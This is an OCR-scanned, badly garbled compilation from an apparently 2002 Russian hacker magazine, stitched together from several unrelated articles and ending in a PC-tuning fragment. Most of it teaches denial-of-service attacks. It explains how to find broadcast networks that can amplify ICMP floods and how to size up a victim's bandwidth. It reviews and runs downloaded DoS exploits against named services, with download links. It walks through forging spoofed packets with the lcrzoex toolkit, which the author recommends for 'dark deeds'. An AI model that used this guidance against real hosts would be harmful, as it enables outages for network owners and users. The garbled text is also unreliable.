толстому каналу, и хакера найти невозможно. Получается, 
что 00$ умножение - один из вариантов распределенной 
атаки, когда тебя отакуют сразу несколько компов. Не 
имей сто друзей, а умей пинговать. 


Дело в том, что во время перемножения сетка-умножитель 
тоже перегружается. Да еще потом приходят дяденьки в 
масках и начинают рыться в логах. Админам, понятное дело, 
это не нравится, и они настраивают шлюз так, чтобы он не 
пропускал ТСМР сообщения для всех компьютеров сети. 
Другие бородачи вообще отключают ТСМР или ограничивают 
количество ответов на ТСМР до 5-10 в минуту. Поэтому 
хакеру придется поискать сетку, в которой разрешены ТСМР 
сообщения для всех машин. 


Это что-то типа телефона только в интернете. Если ты 
хочешь обратиться к компу, ты должен знать его ТР. По IP 
можно найти человека в сети и привлечь его к 
ответственности. IP состоит из четырех байт. Каждый байт 
состоит из восьми бит. IP адрес обычно записывают с 
помощью четырех десятичных чисел: каждый байт - 
десятичное число. 


используя умножение DoS. 


Чтобы научиться пинговать группу компов ты должен 
научиться переводить ТР в двоичный вид. Я не буду 
напрягать тебя дискретной математикой, просто 
открой стандартный микрокалькулятор, который есть в 
любом Windows. В меню \1ем/(вид) нужно выбрать $с1- 
еп Яс(научный), тогда калькулятор станет раза в 3 
больше и там появятся функции перевода из одной 
системы счисления в другую. Допустим, ты решил 
перевести число 255 в двоичный вид. Набираешь на 
калькуляторе 255 и ставишь галочку BIN(Binary), 
тогда твое число переводится в двоичную систему и 
записывается как нули с единицами: 255DEC=1111 
1111BIN. Чтобы перевести 8 единиц в десятичную 
систему, нужно поставить галочку DEC(decimal). 


Ну, теперь переводи ТР адрес 192.168.0.91 в двоичную. 
192DEC=1100 OOOOBIN 

168DEC=1010 1000BIN 

ODEC=0000 OOOOBIN 

91DEC=0101 1011BIN 


Адрес 192.168.0.91 в двоичном виде будет: 
1100 0000.1010 1000.0000 0000. 0101 1011. 


Если ты сидишь в локальной сети, то всем тачкам из твоей 
локалки дойдет сообщение с адресом 1111 1111.1111 
1111.1111 1111.1111 1111, то есть все единицы, или в 
десятичном виде 255.255.255.255. 
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Если ты хочешь пингануть все компы какой-то внешней 
сети, то нужно к сетевому адресу добавить единицы. 
Например 192.168.255.255 пропингует компы в сети 
192.168. 


Есть три основных типа сети А, В и С. Определить их 
просто, если перевести первый байт ТР адреса в двоичный 
вид. Если адрес начинается на 0 - это А, если на 1 - B, и 
если на 11 - С. 

Широковещательные адреса, по которым можно 
обратиться ко всем компьютерам сети, будут такими: 


Для сети А: XXX.255.255.255 
Для сети В: ХХХ.ХХХ.255.255 
Для сети С: ХХХ.ХХХ.ХХХ.255 


ХХХ - это адрес сети, который может быть любым числом 
oT 1 до 254, с некоторыми исключениями. То есть, ты 
сначала определяешь тип сети по первому байту, а потом, 
в зависимости от класса сети, заменяешь хвост адреса на 
двоичные единицы (255 в десятичной системе). 


Все так просто, если сеть не разбита на подсети. Иначе 
задача усложняется до геморроидальности. Тебе нужно 
выяснить, какая часть ТР адреса относится к адресу сети, а 
какая - к адресу компа. Если для стандартных сетей класса 
А, В, С длина этой части стандартная, то для подсетей она 
может быть любой. 


Сети разбиваются на подсети с помощью маски, и ты 
можешь отправить ТСМР запрос на получение маски 
подсети по ТР адресу. Маска подсети поможет тебе 
вычислить широковещательный адрес для данной подсети. 


Допустим 
адрес: 192.168.0.70 
маска подсети: 255.255.255.192 


Переводим в двоичный вид: 

Адрес: 1100 0000.1010 1000.0100 0110 

Е ee Маска: 1111 1111.1111 1111.1100 0000 
Сеть: 1100 0000.1010 1000.0100 0000 


Широковещательный: 1100 0000.1010 1000.0111 1111 


Часть IP адреса, помеченная единичками в маске подсети, 
и есть адрес подсети. А там, где у маски стоят нули, у IP 
стоит адрес хоста или интерфейса в этой подсети. Чтобы 
обратиться ко всем адресам этой подсети 
(широковещательно), нужно к адресу подсети добавить 
хвост из единичек. То есть все единички на месте адреса 
хоста означают все адреса. Видишь, я под адресом 
подписал маску. Там где под адресом в маске стоят 
единицы, ты оставляешь адрес, а там где стоят нули, 
записываешь единицы. Так получается 
широковещательный адрес. 


Теперь переводим полученный широковещательный адрес 
в десятичный вид: 192.168.0.63. Можно было получить то 
же самое, если бы мы вычли 255-192=63. Но не во всех 
случаях можно так легко догадаться. 


Остается перебирать широковещательные адреса, благо 
их не много. 


Например, адрес 192.168.0.70. Маску мы не знаем, хотим 
узнать широковещательный адрес. 


Переводим в двоичный вид первый байт ТР адреса: 
192DEC=1100 OOOOBIN. УРА! Адрес начинается на 11, 


значит эта сеть класса С, значит первые три байта 
сетевые, значит маска будет от 255.255.255.0 до 
ВОЗ 259293) .2 52. 


Переводим в двоичный вид: 

fre ee eee Адрес: 1100 0000.1010 1000.0100 0110 
Широковещательный1: 1100 0000.1010 1000.0100 0111 
Широковещательный2?: 1100 0000.1010 1000.0100 1111 
Широковещательный3: 1100 0000.1010 1000.0101 1111 
Широковещательный4: 1100 0000.1010 1000.0111 1111 
Широковещательныйб5: 1100 0000.1010 1000.1111 1111 


Метод подбора простой: хакер постепенно заменяет 
последний байт адреса единичками и пробует 
широковещательно пропинговать. По сути, хакер 
просто сканирует сеть на наличие широковещательного 
отклика. Во многих сетях и подсетях 
широковещательный ТСМР эхо запрос отключен для 
безопасности. Но обязательно найдутся сети, в 
которых забыли отключить эту фичу. Такая сеть будет 
работать как умножитель 005 атаки. 


Для атаки DoS очень важно, чтобы канал жертвы был 
намного уже канала, с которого атакуют, поэтому 
хорошо бы узнать, на каком канале висит сервер или 
пользователь. Нужно узнать кто провайдер. Это можно 
сделать с помощью команды tracert, или с помощью 
Unix команды Whois, на сервере провайдера или 
фирмы. Нужно проанализировать инфу о том, какой 
канал у провайдера, какой канал у фирмы, какие 
шлюзы задействованы. 


Можно, конечно, прикинуть по косвенным признакам 
толщину канала чужой сети или сервера, но многие 
фирмы честно пишут какой у них канал. Если 
пользователь сидит на модеме, то канал не больше 15 
килобит в секунду. Если хачат домашнюю сетку, или 
небольшой офис, или институт, то канал, скорее всего, 
от 128 килобит в секунду до 2 мегабит в секунду. 


Если на домашнем сайте владельца сети ты видишь 
такие умные цифры, как E1, E2, ЕЗ, Т1, Т2, ТЗ, то, 
значит, использованы высокоскоростные каналы 
европейской или американской цифровой иерархии. 


Скорости каналов европейской цифровой иерархии: 
Е1 = 2048 Килобит в секунду 

E2 = 8448 Килобит в секунду 

ЕЗ = 34368 Килобит в секунду 

E4 = 139246 Килобит в секунду 


Скорости каналов американской цифровой иерархии: 
Т1 = 1544 Килобит в секунду 

T2 = 6312 Килобит в секунду 

T3 = 44736 Килобит в секунду 


Итого, хакеру нужно разобраться с протоколом IP(Internet 
Protocol), с его адресацией и заголовками. Нужно 
научиться определять адреса сетей и подсетей, вычислять 
широковещательный адрес подбором и по маске подсети. 
Придется разобраться с классами сетей. Полезно будет 
изучить протокол ICMP(Internet Control Message Protocol), 
и разобраться с эхо-запросами/ответами, с определением 
маски подсети по ТР адресу. 


Эти знания помогут накеру 

использовать возможности Интернет 

для изобретения самой зверской на свете 
атаки DoS. 


энеппочцт | 


обзор и тестирование 


Во5-эксплоитов 


адача простая — найти в инете несколько Оо5-эксплоитов, 
скачать, разобраться, скомпилировать и попробовать. 
Посмотрим, что из этого получится :). 

ЗЫ У меня стандартная RedHat 7.3. 


Експлоит: spj-003.c 

Утянуть: http://vk.pp.ru/docs/hack/exploits/daemon/ch 
gen/spj-003.c 

Атака на: chargen 


Тяну и сразу лезу в исходник — поглядеть, что там в 
исходнике говорят. А говорят, что это флудер на 7-0 
который мутит с спагдеп-сервисом, спуфит что-то там и 


доводит дело до DoS. Хм, заманчиво — попробуем 
откомпилить: 


Упс, ошибка +6; Что у него там не сладилось — это уже HE мое 
дело, поэтому едем дальше. 


Експлоит: xdestroy.c 

Утянуть: 
http://vk.pp.ru/docs/hack/exploits/daemon/xwin/xdestroy.c 
Атака Ha: X Window System 


В загаловке пишут, что эта штука способна завалить все окна 


любого Х-сервака — ну очень заманчиво звучит :). Аж руки 
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Эх, опять глюкавый эксплоит попался (или просто к системе 
моей не подошел)... 


Експлоит: smdos.c 

Утянуть: 
http://vk.pp.ru/docs/hack/exploit 
mail/8.9/smdos.c 

Атака Ha: sendmail 8.9 


aemon/mail/send- 


Качаю и читаю описалово в заголовке файла: там говорится, 
что это 0о5-эксплоит против Sendmail до версии 8.9.3. 
Достаточно скупо, ну и фиг с ним - будем компилить: 


Эндлайна нет - это фигня, главное, что эксплоит нормально 
скомпилился :). Попробуем запустить: 


august/08/2002 


Sendmail у меня более свежей версии, поэтому эксплоит, 
естественно, нифига не пашет, но есть все основания 
надеяться, что на соответствующей версии он запашет как 
миленький. 


Експлоит: crash_ftpd.c 

Утянуть: 
http://vk.pp.ru/docs/hack/exploits/daemon/ftpd/crash_ftpd.c 
Атака на: proftpd 1.2.0pre4 


В хидере эксплоита пишут, что это, типа, краш для proftpd 
1.2.0pre4 из-за переполнения буфера. А еще там есть 
настройка на IP предполагаемой жертвы - пишу туду самого 
себя: 127.0.0.1. Так-так, посмотрим, откомпилится ли этот 
краш ;): 


Ara, скомпилился :). У меня такого ЕТР-сервака и в помине 
нет, но попробуем запустить и поглядеть, идут ли какие- 


ЗЛОБНЫЙ ЭКСПЛОИТ НА ТРОПЕ ВОЙНЫ 


нибудь пакеты в сеть (у меня снифак в фоне висит, поэтому я 
сразу вижу, когда идут пакеты). Ввожу: 


./crash_ftpd 


и вижу, что по сети пошел всего один пакет ;). Но, видимо, 
этого достаточно, чтоб завалить ЕТР` шник под управлением 
proftpd 1.2.0pre4. Пошли дальше. 


Експлоит: nestea.c 

Утянуть: 

http://www. insecure.org/sploits/linux.PalmOS.nestea.html 
Атака Ha: Linux 2.0.33 и более ранние 


Хоть у меня ядрышко и посвежее — откомпилить эту штучку 
CTOUT: 


A теперь запустим: 
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ЗЛОБНЫЙ ЭКСПЛОИТ НА ТРОПЕ ВОЙНЫ 


Ух ты! Пакетов-то сколько по сети напускал!!! Явно убил бы 
меня, если бы не свеженькая версия ядра ;). Кстати, 
прикольно — эксплоит довольно продвинутый, с опциями, 
спуфингом - все дела. 


Експлоит: send_arp.c 
Утянуть: http://www.insecure.org/sploits/arp.games.html 
Атака Ha: TCP/IP стек 


Попробуем-ка теперь скомпилить этого зверя: 


Ого! Эрорчиков-то сколько! Нет, это, видимо гиблый эксплоит 
— фигс ним. 


Експлоит: icmp_redir.c 
Утянуть: http://www.insecure.org/sploits/arp.games.html 
Атака Ha: TCP/IP стек 


И еще один пациент — последний (а то так до бесконечности 
можно этим делом заниматься). Компилим: 


Скомпилировался молча — посмотрим, что скажет при запуске: 


Что-то он там муторное просил — влом разбираться - я ему 
ввел со второго раза :). По сети пошел пакет... 
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ЧЕМ БЫ ТЫ HE SAHAMAACS..—.AOMAHUACTPAPOBAA ИЛИ 
ВЗЛАМЫВАЛ, СТРСИЛ ИЛИ РАЗРУШАЛ — ХОРОШО БЫ 
ЗНАТЬ СВОЕ ДЕЛО ДОСКОНАЛЬНО. НАПРИМЕР, ГОВОРЯТ, 
ЧТО ХОРОШИЙ КОДЕР СПОСОБЕН ПРИБЛИЗИТЕЛЬНО 
понять, что ДЕЛАЕТ ПРОГРАММКА, ВЗГЛЯНУВ НА 
МАШИННЫЙ КОД :). А МЫ ЧЕМ ХУЖЕ? ТОЛЬКО В НАШЕМ 
ДЕЛЕ (NETWORK SECURITY) САМОЕ ВАЖНОЕ НЕ КОД, А 
логи. ЕСЛИ ТЫ НАУЧИШЬСЯ, БЫСТРО 
ОПРЕДЕЛЯТЬ ПО ЛОГАМ, ЧТО 
ПРОИСХОДИЛО С СЕРВАКОМ В 
НЕДАВНЕМ ПРОШЛОМ, СТАНЕШЬ 
высокопРОФРЕССИОНАЛЬНЫМ И 
ВОСТРЕБОВАННЫМ СПЕЦИАЛИСТОМ :), 
ПОТОМУ КАК БОЛЬШИНСТВО НАШИХ 
OYBOrOAOBBIX АДМИНОВ HE УМЕНЗТ 
ЧИТАТЬ ЛОГИ. 

ТАК КАК.МЫ СЕЙЧАС BCECTOPOHHE 
РАССМАТРИВАЕМ ООСЗ-АТАКИ, Я 
ПРАИГСОТОВИЛ ДЛЯ ТЕБЯ ЛОГИ 
НАИБОЛЕЕ ЧАСТО ЮЗАЕМЫХ DOS- 
АТАК. ЧТОБ ТЕБЕ БЫЛО ПРОЩЕ, И 
можно БЫЛО СРАВНИВАТЬ, Я 
ОТЛАВЛИВАЛ ТРАЗРИК СЕТЕВЫХ АТАК 
СРАЗУ ДВУМЯ ПРОГАМИ: ОБОЖАЕМЫМ 
АДМИНАМИ ТСРОЧЦМР`ОМ и ОБЫЧНЫМ 
СНИФРАКОМ. СОВЕТУНЗ.. СНАЧАЛА 
СМОТРЕТЬ НА _ ЛОГ CHUAPHTEPA, А УЖ 
ПОТОМ РАЗБИРАТЬСЯ С TCPDUMP OM. 
АТАКИ ВЕЛИСЬ С МОЕЙ МАШИНЫ НА 
МОК ЖЕ МАШИНУ. ЕСЛИ HE ЗНАЕЩЬ, 
что ИЗ СЕБЯ ПРЕДСТАВЛЯЕТ ТА ИЛИ 
ИНАЯ АТАКА, СМОТРИ СТАТЬНЗ 
“СЕМЕЙСТВО DOS” В ЭТОМ ЖЕ 
НОМЕРЕ ИЛИ ИЩИ ОПИСАЛОВО В НЕТЕ. 
УДАЧНЫХ PASBOPOK! 
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nOah (noah@real.xakep.ru) 


LORZOEX - ЭТО УНИВЕРСАЛЬНАЯ СЕТЕВАЯ TYASA, 
который ЧТО-ЛИБО МУТИТ В 


ОБХОДИМАЯ ЛЮБОМУ ПЕРЦУ, 


ИМХО, HE- 


NET E (НАПРИМЕР, ИЗУЧАЕТ ;) DOS-ATAKM). САМ РАЗРАБОТ- 


YUK ПИШЕТ О СВОЕЙ ПРОГЕ TAK: 
FOR NETWORK ADMINISTRATORS AND NETWORK HACKERS”, 
“| CRZOEX - ЭТО НАБОР ИНСТРУМЕНТОВ ДЛЯ СЕ- 


ОЗНАЧАЕТ: 


ТЕВЫХ АДМИНИСТРАТОРОВ И СЕТЕВЫХ ХАКЕРОВ? 
могли оБДЕЛИТЬ ВНИМАНИЕМ ПРОГРАММУ, 
ТОРОЙ СКАЗАНО, ЧТО ОНА ДЛЯ ХАКЕРОВ? 


“| CRZOEX IS А TOOLBOX 
что 


(НУ КАК МЫ 
В ОПИСАНИИ KO- 
:)). И ДВЕЙСТВИ- 


ТЕЛЬНО: LORZOEX - ЭТО НЕ ОДНА ТУЛЗА, А ЦЕЛЫЙ КОМПЛЕКТ 
ПРИМОЧЕК (ОКОЛО ТРЕХ СОТЕН), ОБЪЕДИНЕННЫХ В ОДНУ 


БОЛЬШУН МАХИНУ. ТУТ ТЕБЕ И CKAHHEP, 
И пинг - ОДНОМУ ТУКСУ ИЗВЕСТНО, ЧЕГО ТАМ НЕТ. 


СПУ®ЕР, 


И СНИРФЕР, И 


ТАК ЧТО, ПРИЯТЕЛЬ, ЕСЛИ ТЕБЕ НУЖЕН МОЩНЫЙ И УНИВЕР- 
САЛЬНЫЙ ИНСТРУМЕНТ ДЛЯ СВОИХ ТЕМНЫХ ДЕЛИШЕК, КАЧАЙ 
- НЕ ПОЖАЛЕЕШЬ. ДЛЯ МЕНЯ ЭТА ПРОГА СТАЛА Одной из 
основных ПОСЛЕ ПЕРВОГО ЖЕ ЗНАКОМСТВА :). 


СТАВИМ 

Качнуть lcrzoex можно тут: http://www.laurentconstantin.com 
(текущая версия - 4.1). Но чтоб все заработало, придется ска- 
чать еще и библиотеку lcrzo (найдешь на этом же сайте). Есть 
исходники под nix и бинарники под win. (Рис. 1) 

С мастдаями я связываться не стал, а скачал родные ни- 
ксовые .tgz wku. Как оказалось, для работы под линухом 
[стгоех`у нужна библиотека ИБрсар. Не вопрос: нашел в 
Инете версию этой библиотеки 0.4, поставил и... и убил 
себе три часа времени :(. Во время компиляции lcrzoex 
(который ставится уже после [сг2о) возникли эрорчики, и 
я полез править исходники. Потратив кучу времени, по- 
фиксил первый эрор, а когда добрался до места в коде 


со вторым, жестоко обломался, увидев вот такой вот 
комментарий к коду: (Рис. 2) 

Оказывается, нужно было ставить ИБрсар не меньше версии 
0.6. Черт, как я зол был! Наковырялся в чужом коде по самые 
помидоры :). Ок, сношу libpcap-0.4, ставлю ИБрсар-0.6 (он у 
меня в дистрибутиве оказался) - на этот раз все компилирует- 
ся нормально. Ставится lcrzoex следующим образом: сначала 
распаковываешь архив с lcrzo, залезаешь в получившуюся ди- 
ректорию, в ней лезешь в ./зтс и вводишь последовательно: 
“/genemake”, “make”, “make install”. То же самое проделыва- 
ешь с самим lcrzoex. Все, теперь прога установлена - можно 
вводить в командной строке “[стгоех” и начинать более тесное 
знакомство. Кстати, о тесном знакомстве: на сайте имеется ар- 
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ХИВЧИК С документацией, в котором есть довольно подробные 
туториал, мануал и экземплы Ne Качни, если не ломает. 


ЩУПВЕМ 


Для того чтобы запустить одну из 300 тулз, надо вбить: 
lcrzoex nnn 


Где “nnn” - это номер тулзы. Чтобы узнать, какие вообще тул- 
зы бывают и какие у них номера, надо просто запустить lcr- 
zoex без параметров. (Puc. 3) 


Перед нами главное меню проги. Каждому пункту подменю 
соответствует своя буква или цифра. Давай для начала по- 
смотрим, что имеется в easy tools (типа, простые тулзы, буков- 
ка “а”). (Гис. 4) 


Хм, мне почему-то интересно посмотреть, что скрывается под 
заманчивым “sniff packets and prin them” под буковкой “4” 
(кстати, видишь, рядом стоит номер - 274, это означает, что 
эту тулзу (в данном случае - сниффер) можно вызвать, просто 
набрав [сггоех 274). Топаем батон “4”, видим кратенькое опи- 
сание тулзы, а потом, выпав в командную строку, набираем 
это самое “[сгхоех 274": (Рис. 5) 


Сниффер предлагает выбрать интерфейс, по которому надо 
сниффать - выбираем loopback (Lo - 1): (Рис. 6) 


Теперь прога предлагает выбрать способ отображения пере- 
хваченных пакетов - выбираем второй, он самый простой. 
Все, прога перешла в режим перехвата. Все, что будет отлов- 
лено, будет выводиться на экран (для ознакомления это удоб- 
но, но в реальной ситуации лучше сохранять все в файл - для 
этого в главном меню надо выбрать пункт “с”, а в нем “Б” - 
дальше выберешь то, что надо). Для проверки откроем другое 
окно терминалки и пропингуем себя же: 


ping 127.0.0.1 (Рис. 7) 


Сниффак показывает, что от 127.0.0.1 на 127.0.0.1 пришел 
ICMP_ECHO_REQUEST (ICMP8), а потом от 127.0.0.1 на 
127.0.0.1 ушел ответный ICMP_ECHO_REPLY (ICMP8). И так три 
раза :). Ок, давай усложним пример: выберем более подроб- 
ный способ отображения перехваченных пакетов. Жмем 
Ctrl+C, чтоб выйти из сниффака в консоль, потом набираем 
“[стгоех 274”, выбираем интерфейс lo и способ отображения 
под циферкой “4”. Пингуем еще раз: 
ping 127.0.0.1 (Puc. 8) 


Ну как? Нравится :)? То, что в виде таблички - это заголовок 
пришедшего эхо-запроса, ниже - данные в шестнадцатерич- 
ном формате, потом заголовок ушедшего пинг-ответа со сво- 
ими данными (такие же, как пришедшие, так как пинг всегда 
возвращает то, что получил). Приятель, таким образом (за- 
сылая себе всякие запросы, сниффая их и изучая пакеты) 
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можно научиться формировать любой пакет 
ручками! А это как раз самое оно для прове- 
дения DoS-atak!!! А для того, чтобы формиро- 
вать пакеты, мы воспользуемся другой тулзой 
из Lcrzoex (я же говорил - там есть все ;)). Но 
давай сначала попробуем еще одну фишку: 
залезем к себе Ha \меБ-сервер, запросим 
index.html, посниффаем пакеты и посмотрим, 
как они выглядят (для того, чтобы научиться 
самим формировать запросы к мер-сервакам 
на уровне пакетов). Для этого делаем телнет 
себе на 80 порт: 


telent 127.0.0.1 80 (Рис. 9) 


Все гуд, коннект есть. Посмотрим, что показы- 
вает сниффак: (Рис. 10) 


А он показывает, что прошли какие-то заго- 
ловки - данных пока нет. Ок, сейчас сделаем и 
данные: пишем в окне телнета: 


GET /index.html (Рис. 11) 


Видим, что web-cepBak прислал нам содержа- 
ние index.html (я его специально сделал таким 
простым, чтоб не загромождать) и закрыл со- 
единение. А что нам скажет сниффер? Смот- 
рим: (Рис. 12) 


На скрине все, естественно, не поместилось, 
поэтому я тебе показываю только пакеты с ше- 
стнадцатеричными данными нашего запроса 
(СЕТ /index.html) - там ниже есть еще ответ 
сервака с содержанием index.html, а также па- 
кеты закрытия соединения. Короче, все это не 
так важно - важно то, что таким образом мож- 
но своими глазами увидеть каждый пакет (лю- 
бой), чтоб в дальнейшем суметь самому со- 
брать такой же. Если интересно, можешь точ- 
но так же приконнектиться к своему telnet- 
серваку (или к любому другому) и посмотреть, 
каким образом там происходит взаимодейст- 
вие на уровне пакетов. А я сейчас расскажу, 
как при помощи [сггоех генерировать пакеты. 
Так как мы тут по полной калбасимся 005-ата- 
ками, вникая и разгребая, давай я сразу пока- 
жу, как генерить споупанные пакеты - это ак- 
Туальнее ;). Заходим в главное меню [сггоех и 
нажимаем клавишу “е” (Ethernet and IP spoof) 
- под ней лежат тулзы для снифа по езернету и 
по ТР. Езернет может пригодиться, если есть 
локалка, но у меня ее сейчас нет, так что буду 
рассказывать про IP spoof. Меню спуфных тулз 
выглядит так: (Рис. 13) 


Как видишь, все разбито на протоколы. Давай 
посмотрим на примере ТСМР-спуфинга, на его 
основе можно сделать кучу 0о5-атак. Жмем 


“nou 


е” и попадаем в еще одно меню: (Рис. 14) 


Все тулзы, в описании которых имеется ЕТН, 
относятся к езернетовскому спуфингу, поэто- 
му нас будут интересовать только первые две 
тулзы (буква “a” и буква “b”). А отличаются 
они тем, что первая тулза работает как мастер, 
постепенно задавая тебе вопросы и собирая 
параметры, а вторая - просто ждет от тебя ко- 
мандную строку с уже проставленными пара- 
метрами. Когда ты уже хорошенько ознако- 
мишься с lcrzoex, будешь пользоваться только 
вторым вариантом (так удобнее), а пока давай 


“acu 


посмотрим, что с первым. Жмем “а”, видим HO- 
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мер тулзы и выпадаем в командную строку. Номер тулзы - 65, 
поэтому, для того чтобы ее вызвать, надо набрать: 


lcrzoex 65 


Тулза сразу спрашивает, мол, что будем подставлять 
под source IP? Вводим, что надо, например: 
192.168.0.3. Сразу следующий вопрос: куда слать? Пус- 
кай - самим себе: 127.0.0.1. IP options - просто жмем 
Enter. Туре - какой тип ICMP пакета слать будем? Эта 
прога позволяет создать любой ТСМР-пакет, но мы да- 
вай воспользуемся типом ICMP_ECHO_REQUEST, как 
обычный пинг (только спуфанный ;)) - вбиваем цифру 
“8”. Code - жмем Enter. Packet’ 5 data - данные, которые 
будут отправляться внутри пакета. Для 
ICMP_ECHO_REQUEST не важно, что будет внутри, так как 
ICMP_ECHO_REPLY вернет то же самое, поэтому вводим 


что-нибудь типа ‘fuck you!’. Все, пакет готов - осталось 
только нажать Enter ;). (Рис. 15) 


Таким же образом можно собрать абсолютно любой пакет 
любого протокола! А чтобы окончательно убедить тебя в 
том, что lcrzoex - рулез суперский, просто перечислю какие 
еще тулзы там есть (мы посмотрели только сниффер и спу- 
фер): кастамайзимируемые клиенты и сервера для любых 
протоколов, трейсроуты и пинги, сканнеры, флудеры, встро- 
енные эксплоиты (в том числе и для DoS), отправка спуфан- 
ного мыла, брутфорсеры (для огромного количества серви- 
сов), различные конверторы (даже dos2unix) и еще целая 
куча других тулз. 


ЗЫ 
Если все таки поставишь себе эту штуку, загляни в тат тепи- 
>malicious utilities->network attacks->ICMP attacks. ac 
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UHPA по DoS в СЕТЫ 


aDm 


Net — незаменимая штука. И не только потому, что в нем можно 
есть, спать, общаться, хакать, изучать - жить, но и потому, что в нем 
всегда полно инфы. На любые темы. И DoS-atakn — не исключение. 
Хочешь набраться инфы? Лезьвнет :). A урлы я тебе подкину ;). 


ТАЛМУД: HTTP:/WWW.KRGTU.RU/ 
WD/TUTOR/TCGPIP/TCPIP.HTML. 


Описалово: 0, это просто величайший талмуд из всех талму- 
дов! Называется “Протоколы сетевого взаимодействия 
TCP/IP”. Практически целая книженция, если перевести ее из 
цифрового в аналоговый вариант ;). Если хочешь изучать ка- 
кие-либо сетевые атаки, без этой информации тебе не обой- 
тись. Тут все о TCP/IP, начиная с низкого уровня и с постепен- 
ным переходом на более высокий. В плане DoS-atak наиболь- 
ший интерес может вызвать глава о ТСМР, где очень грамотно 
рассмотрен этот мегаполезный для DoS epa протокол. По- 
дробно разобран заголовок пакетов ТСМР, рассмотрены типы 
ТСМР-пакетов, их назначения. Талмуд написан черствым тех- 
ническим языком, и это немного напрягает — грузит, но в це- 
лом инфа выложена достаточно четко, так что с пониманием 
проблем быть не должно :). Короче, читай — эти знания при- 
годятся тебе в любом случае, даже если ты ушастый юзер и 
кроме браузера ничего сетевого никогда не видел. 


ТАЛМУД: HTTP:/UNIX.ORG.UA/ 
ROUTING/3/. 
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Описалово: “Маршрутизаторы в глобальных сетях” — руко- 
водство для админов, как выбрать маршрутизатор для своей 
сетки. “Че за фигня? А мне-то это к чему?” — можешь спросить 


ты. Ну, про покупку маршрутизатора, может, и ни кчему, а вот, 
например, про классификацию цифровых каналов — очень 
даже к чему (например, для расчета целесообразности DoS- 
атаки). Еще не помешает знать, какие модели маршрутизато- 
ров с какими протоколами умеют работать. И вообще, этот 
талмуд дает возможность взглянуть на сеть глазами людей, 
которые обычно стоят по ту сторону баррикад — глазами си- 
садминов. Так что впитывай — прогрузишься хорошенько, за- 
то будешь знать, из чего строят сетки. 


ТАЛМУД: HTTP:/WWW.INFOSEC.RU/ 
PRESS/PUB/PO031000.HTM. 


Описалово: “Распределенные атаки: миф или реальность?” — 
название, конечно, попсовое. Ну что за дурацкий вопрос - ко- 
нечно, реальность. Это уже и так все поняли... Иначе зачем пи- 
сать такие статьи :). А статья, кстати, ничего. Но только для на- 
чинающих — слишком поверхностно. Дает понять, что такое 
0005-атака, расписывает типичную схему, объясняет, в чем 
принципиальные отличия, дает рекомендации по борьбе с ними 
(имхо, ламерские) и тд. В самом начале есть немного истории по 
возникновению DDoS-atak. В общем, так — не рыба, не мясо. 
Сойдет, если ты вообще в первый раз слышишь о DoS-atakax. 


ТАЛМУД: HTTP://KARDINAL.NN.RU/ 
NT_HOLE/DOS.HTM. 
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Описалово: Под названием “Denial of Service” скрывается 
небольшая статья с описанием самых тривиальных DoS-atak. 
Описывается по каждой атаке дается капелька истории ее 
появления, описывается механизм работы, даются ссылки на 
исходник и иногда советы по защите для OS Windows :-/. 
Больше ничего тут нет, но и этого достаточно для первого 
знакомства с DoS-atakmu. Кстати, стиль — не грузилово, а 
нормальный язык людей, проводящих какую-то часть своей 
жизни за компом ;). 


ТАЛМУД: AHTTP:/NETSECURITY.R2Z.RU/ 
DOCS/PRINCIPI_DOS.HTML. 


Описалово: “Некоторые принципы DoS атак и защита от них” — 
так себе заметочка, но прочитать стоит (опять же, если ты не 
шаришь). Рассказывается о TOM, какие виды 0о5-атак бывают 
(рассмотрено почему-то только два вида — типа, других автор, 


наверное, не знает), как они реализовываются. В самом конце 
стандартные советы по защите: типа, читай багтрак, оператив- 
но ставь апдейты и тд. 


ТАЛМУД: НТТР://212.69.111.203:8080/ 
ARTIGLES/HAGK/HD2.X?7MM=4. 


Описалово: “Краткое описание DDoS-atak” — действительно 
краткое описание DDoS-atak :). Начинается все с традицион- 
ной заметки о нашумевшем взломе Yahoo!, eBay, Buy.com, 
Amazon.com, CNN.com и прочих пострадавших. Далее идет 
описание DoS и DDoS: различия, принцип и все такое. Даются 
характерные особенности 0005. А в конце рассказывается о 
TOM, как сложно фильтровать специально подобранные DoS- 
пакеты, отдирающие драгоценные ресурсы. Еще один текст для 


“самых маленьких”. 
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Если поискать в сети материалы NO оптимизации — можно очень 
долго разбирать горы хлама, противоречащих друг другу заявлений и 
сообщений о «волшебном» ключике в реестре, после которого у чела 
486-й стал работать быстрее соседского Thunderbird’a. 


е верь им, верь только мне :). Я на- 
Ы деюсь, у тебя уже есть некоторые 

свои взгляды на оптимизацию, и я 
не собираюсь их оспаривать, даже на- 
оборот, если с чем не согласен - напиши 
и поделись своими мыслями. Но если ты 
боишься запускать regedit, лезть в сис- 
темные файлы или разбираться в наст- 
ройках твикеров - послушай бывалого 
оптимизатора, человека, которого начи- 
нает трясти при виде не фрагментиро- 
ванного годами харда, человека, у кото- 
рого начинают чесаться ручки, когда ему 


том, тормозящим работу системы, явля- 
ется вовсе не твой любимый разогнан- 
ный Celeron и не видюха, а дисковая под- 
система. Даже самые быстрые интер- 
фейсы (SCSI, Raid, ATA133) не могут 
сравниться по пропускной способности с 
оперативкой. Разница - во много раз. К 
тому же несколько операций записи-чте- 
ния в общем случае не могут происхо- 
дить одновременно: головка должна пе- 
реместиться, считать инфу, перейти в 
другое место. Но представь - мы считали 
файл, поработали с ним, закрыли. Какое- 


Цело все в том, что основным узким местом, тормозящим работу системы, 
является вовсе не твой любимый разогнанный Celeron и не видюна, 


попадаются где-нибудь настройки, вы- 
ставленные по дефолту, и, наконец, че- 
ловека, которого друзья уже не подпус- 
кают к своим компам :). Даже если после 
моих советов комп и не станет сразу ра- 
ботать в двадцать раз шустрее, не отчаи- 
вайся: все, что я рассказываю, - легко 
для понимания, и ты быстро сам смек- 
нешь, что и как надо подкорректировать 
именно для твоей машины. Ты готов? 
Тогда приступим к первому занятию - ра- 
боте с кэшем. 


БУФЕРЯ М УЗННЕ MECTA 


И где только не рассказывалось, что надо 
прописать в system.ini, чтобы оптимизи- 
ровать кэш так, как считает нужным автор 
статьи, но мало где разъяснялось, а на 
фига, собственно, этот кэш нужен (не по- 
нял, наезды на босса? - прим. Дронича). 
Дело все в том, что основным узким мес- 


пользовать отложенное чтение (почитай 
как-нибудь на досуге про Smartdrive). Ка- 
залось бы, за это время можно научиться 
хорошо настраивать кэш. Но из-за кри- 
вых рук Гейтса (хотя, может, и из-за тво- 
их, если ты неправильно юзаешь твике- 
ры) так происходит не всегда. Более то- 
го, слишком большой кэш отнимает мес- 
